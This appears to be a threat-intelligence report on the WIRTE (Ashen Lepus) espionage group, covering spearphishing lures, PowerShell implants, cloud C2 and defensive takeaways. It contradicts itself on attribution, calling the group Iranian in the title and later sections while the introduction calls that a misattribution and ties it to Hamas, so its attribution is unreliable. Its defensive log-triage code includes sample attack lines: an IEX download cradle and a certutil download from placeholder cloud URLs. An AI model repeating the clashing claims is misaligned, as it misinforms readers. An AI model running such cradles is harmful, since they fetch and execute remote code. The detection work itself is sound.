WIRTE: Iran’s Covert Espionage Actor Targeting the Middle East and Beyond

APRIL 21, 2026

Introduction

The WIRTE APT group has been conducting regional espionage for several years, dating back to at least 2018. The cybersecurity community has not always tracked WIRTE as a separate APT because it has been widely misattributed as an Iranian state-sponsored actor. In reality, WIRTE (also known by the codename “Ashen Lepus”) is linked by threat intelligence to the Gaza Cybergang ecosystem, a collective of APT groups with possible ties to Hamas.

Despite having limited resources, WIRTE has conducted successful, highly effective operations through precise execution. The actor weaponizes basic technology (e.g., Microsoft Office macros, PowerShell, and cloud services) to maintain a persistent presence on target networks and collect sensitive information. By flying under the radar and avoiding the flashier techniques, such as zero-day exploits, that are typical of top-tier APTs, WIRTE has developed a prolific and discreet espionage capability within the Middle East.


Identity and Motivation

WIRTE (a separate entity from the Iranian IRGC) has its own distinct tradecraft that aligns with the group’s Palestinian political objectives, and it acts as the highly active intelligence-gathering arm of the wider Gaza Cybergang network.

Motivations:

  1. Regional Espionage: Collecting information on national defense, external relationships, and internal political developments within Middle Eastern states by targeting government agencies, military entities, and diplomats in the Palestinian Authority, Jordan, Egypt and Saudi Arabia.
  2. Strategic Intelligence Support: Providing actionable strategic intelligence in support of the geopolitical and military objectives of Hamas and other Palestinian factions, with a primary focus on monitoring regional realignment.
  3. Counterintelligence Operations: Monitoring dissidents and diplomatic communications that affect Palestinian-related political activity in the Gaza Strip.

Tactics, Techniques, and Procedures (TTPs)

WIRTE operates in a cost-effective and efficient manner. The group relies on small, modular implants and on social engineering to run numerous campaigns.

1. Initial Access

WIRTE primarily gains access via spearphishing emails; these emails carry malicious document attachments and are written in Arabic or English. The poisoned documents tend to be themed around political events and diplomatic meetings. When a poisoned document is opened, it executes embedded VBA (Visual Basic for Applications) macros or PowerShell commands to deploy the first-stage payload. In a small number of cases, WIRTE has used remote template injection, where the document itself is clean but loads a template stored on a server controlled by WIRTE. This gives WIRTE the ability to serve a payload that is updated dynamically after the lure has been sent.
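Remote template injection leaves a recognisable trace inside the .docx package: a relationship of type attachedTemplate in word/_rels/settings.xml.rels whose target is an external URL rather than a local template. The following detector is an added example (not code from the original report or from WIRTE); the schema URIs are the standard Office Open XML identifiers, and the sample documents it builds are constructed fixtures, not real lure files.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Standard Office Open XML identifiers (public schema URIs, not page-specific values).
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REL_PART = "word/_rels/settings.xml.rels"

def find_remote_templates(docx_bytes: bytes) -> list:
    """Return the URL/UNC targets of every remotely attached template in a .docx.

    No attachedTemplate relationship, or one pointing at a local .dotm, is
    normal. An External relationship whose Target is an http(s) URL or a UNC
    path is the remote-template-injection pattern worth alerting on.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if REL_PART not in zf.namelist():
            return hits
        root = ET.fromstring(zf.read(REL_PART))
        for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE or rel.get("TargetMode") != "External":
                continue
            target = rel.get("Target", "")
            if re.match(r"(?i)^(https?://|\\\\)", target):
                hits.append(target)
    return hits

def build_sample_docx(template_target: str = "") -> bytes:
    """Constructed minimal .docx used only to exercise the detector; not a real lure."""
    rels = f'<Relationships xmlns="{PKG_NS}">'
    if template_target:
        rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                 f'Target="{template_target}" TargetMode="External"/>')
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(REL_PART, rels)
    return buf.getvalue()

if __name__ == "__main__":
    print(find_remote_templates(build_sample_docx()))
    print(find_remote_templates(build_sample_docx("https://templates.example/x.dotm")))
```

Run the same check over attachments in a mail sandbox: a document that carries an external template target is suspicious on its own, before any macro has executed.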

2. Persistence and Privilege Escalation

WIRTE maintains its persistence using registry changes, scheduled tasks, and hidden directories. The group’s custom malware families, such as LitePower and Ferocious, were designed for stealth and persistence on compromised systems. The group is reported to have collected credentials for use in escalating privileges by leveraging PowerShell scripts and Windows Management Instrumentation (WMI) queries. The credentials that WIRTE collects are subsequently stored for lateral movement.

3. Command and Control (C2)

To avoid traditional perimeter defenses, WIRTE uses HTTPS-based command-and-control (C2) channels through cloud platforms (e.g., Google Drive, Dropbox, OneDrive), which conceal their communication within regular traffic, making it more challenging to take down their infrastructure. Additionally, WIRTE has started using alternative channels of communication, like DNS tunneling, to allow for communication when their primary C2 domains are blocked.

4. Malware and Tools

WIRTE maintains a compact toolset of just under a dozen tools and malware families, which proves sufficient for its operations. Some examples include:

– LitePower: A lightweight PowerShell-based “backdoor” that allows for executing remote commands, downloading secondary payloads and collecting information about the system.

– Ferocious: A modular implant that was designed for persistence using obfuscated PowerShell code and had data exfiltration capabilities.

– SurveyScript: A reconnaissance tool for gathering system metadata and building out a map of the network topology.

– VBS Implants: Served as simple script-based payloads to be used at the initial stages of infection.

WIRTE is primarily using script-based malware, which is part of an ongoing trend of increasing script-based malware usage; script-based malware tends to be more flexible, harder to detect, and easier to customize.

5. Exfiltration and Evasion

Data exfiltration takes place over encrypted HTTPS channels and through cloud storage services, where WIRTE’s malicious uploads blend in with those of legitimate users. WIRTE compresses data before encrypting it and uploading it to cloud storage, and frequently deletes the temporary files created during this process to reduce the traces left for investigators. Where possible, WIRTE exfiltrates data using living-off-the-land binaries (LOLBins) built into Windows (e.g., PowerShell, CertUtil, CMD) to minimize its digital forensics footprint.


Notable Operations

WIRTE has carried out numerous targeted espionage operations over the past few years, with each one improving on the last in both stealth and precision.

  • 2019 – Government Espionage Campaigns: The group’s early operations targeted ministries in Jordan and Lebanon with spearphishing documents built around themes of regional cooperation and energy policy.
  • 2021 – Ferocious Campaign: WIRTE launched the Ferocious campaign, deploying a PowerShell payload through malicious Office macros to compromise Saudi Arabian and Emirati diplomatic networks. This campaign marked the group’s move toward modular PowerShell-based frameworks, embodied by the Ferocious malware.
  • 2023 – Cloud C2 Expansion: The group began to use Google Drive and OneDrive as C2 communication channels and integrated cloud APIs to manage infected hosts. This campaign reflects a trend toward operational maturity.
  • 2025 – Strategic Espionage Wave: In today’s continually changing threat landscape, the group has refined its operations to focus solely on the Middle East, with an emphasis on the Palestinian Authority and neighbouring countries. Its goal is to assess shifts in alliances and security policies, as well as domestic developments that affect the Gaza Strip.

These operations illustrate WIRTE’s commitment to intelligence-related objectives while maintaining plausible deniability through infrastructure shared with other Iran-aligned groups that target the region.

Evolution and Tradecraft

WIRTE’s evolution underlines an Iranian cyber approach built on resilience, cost efficiency, and persistence, all characteristics that are prioritized over sophistication. Unlike top-tier actors who use custom zero-days, WIRTE has chosen to make the most of existing, readily available tools to conduct longer-term intelligence collection.

Evolutionary Highlights:

  • 2018–2020: Early phishing campaigns that relied on simple VBS scripts and remote templates.
  • 2021–2023: Modular implants (Ferocious, LitePower) were introduced and C2 moved to cloud-based channels.
  • 2024–2025: A sharper operational tempo, wider infrastructure reach, and more effective Arabic-language lures.

All of these marks of evolution demonstrate how Iranian cyber units have become more professionalized, with smaller entities like WIRTE collecting intelligence in support of larger strategic goals.

Strategic Impact and Defensive Takeaways

WIRTE is central to the regional efforts of Gaza-based cybercriminal groups. Its campaigns have provided compelling evidence of how mid-level APTs can successfully combine social engineering, scripted attacks, and cloud-based technologies as part of their strategy. Defenders should:

  1. Disable, or tightly control, VBA macro execution in all Office products.
  2. Deploy advanced email security with stronger phishing protection, and perform sandboxed analysis of inbound Microsoft Office email attachments.
  3. Audit PowerShell execution logs for unusual activity consistent with the LitePower and Ferocious implants.
  4. Inspect outbound connections to cloud services and correlate unauthorized uploads of sensitive data with the identity of the internal user.
  5. Collaborate with the local CERT to share indicators of compromise (IOCs) from incidents in order to identify reused infrastructure.
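Takeaways 3 and 4 both come down to triaging PowerShell script block logs (event ID 4104) for the patterns this report attributes to WIRTE: download cradles that run fetched code in memory, CertUtil used as a LOLBin, archive staging before upload, and traffic to the cloud storage hosts used for C2. The triage logic below is an added example, not tooling from the original report; the rule set, the cloud host list and the four sample events are constructed for illustration.

```python
import re
from typing import Dict, List

# Cloud storage hosts the report names as WIRTE C2 and exfiltration channels.
CLOUD_HOSTS = ("drive.google.com", "googleapis.com", "dropbox.com",
               "onedrive.live.com", "graph.microsoft.com", "1drv.ms")

# Detection rules over the 4104 ScriptBlockText field: (name, pattern).
RULES = [
    ("download_cradle", re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient")),
    ("in_memory_exec", re.compile(r"(?i)\b(IEX|Invoke-Expression)\b")),
    ("base64_payload", re.compile(r"(?i)FromBase64String|-enc(odedcommand)?\s")),
    ("certutil_lolbin", re.compile(r"(?i)certutil(\.exe)?\s.*-(urlcache|decode)")),
    ("archive_staging", re.compile(r"(?i)Compress-Archive|IO\.Compression")),
]

def score_script_block(text: str) -> Dict:
    """Classify one script block: which rules fired, which cloud hosts appear, and a severity."""
    hits = [name for name, rx in RULES if rx.search(text)]
    hosts = sorted(h for h in CLOUD_HOSTS if h in text.lower())
    if hosts:
        hits.append("cloud_storage_host")
    # A cradle that executes fetched code in memory, or a certutil download, is the
    # LitePower/LOLBin pattern the report describes; staging alone is only medium.
    if {"download_cradle", "in_memory_exec"} <= set(hits) or "certutil_lolbin" in hits:
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "none"
    return {"hits": hits, "cloud_hosts": hosts, "severity": severity}

def triage(events: List[Dict]) -> List[Dict]:
    """Return only the events worth an analyst's attention, annotated with the verdict."""
    out = []
    for ev in events:
        verdict = score_script_block(ev["ScriptBlockText"])
        if verdict["severity"] != "none":
            out.append({**ev, **verdict})
    return out

# Constructed 4104 records for illustration; not real WIRTE samples.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-042", "ScriptBlockText": "Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object"},
    {"id": 2, "host": "WS-042", "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('https://drive.google.com/uc?export=download&id=PLACEHOLDER_ID')"},
    {"id": 3, "host": "WS-017", "ScriptBlockText": "certutil.exe -urlcache -split -f https://www.dropbox.com/s/PLACEHOLDER/update.txt C:\\ProgramData\\update.txt"},
    {"id": 4, "host": "WS-017", "ScriptBlockText": "Compress-Archive -Path C:\\Users\\bob\\Desktop\\reports -DestinationPath $env:TEMP\\r.zip"},
]

if __name__ == "__main__":
    for ev in triage(SAMPLE_EVENTS):
        print(ev["id"], ev["host"], ev["severity"], ev["hits"], ev["cloud_hosts"])
```

Script block logging must be enabled on the endpoints for 4104 events to exist at all; a medium-severity staging hit on the same host shortly before a cloud upload is the correlation takeaway 4 asks for.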

Conclusion

WIRTE (Ashen Lepus) is a robust, stable, and professional cyber-espionage operation that serves the intelligence needs of the Hamas-aligned Gaza Cybergang ecosystem. Its combination of low-tech but effective tools and culturally tailored, manipulative lures makes it a long-term cyber threat in the Middle East. WIRTE’s continued use of established technology at low visibility shows how regional advanced persistent threats can extract substantial intelligence value from operations that are inexpensive to run. To counter this threat actor successfully, defenders must therefore have a thorough understanding of both the geopolitical intelligence priorities and the flexible tradecraft that drive WIRTE.
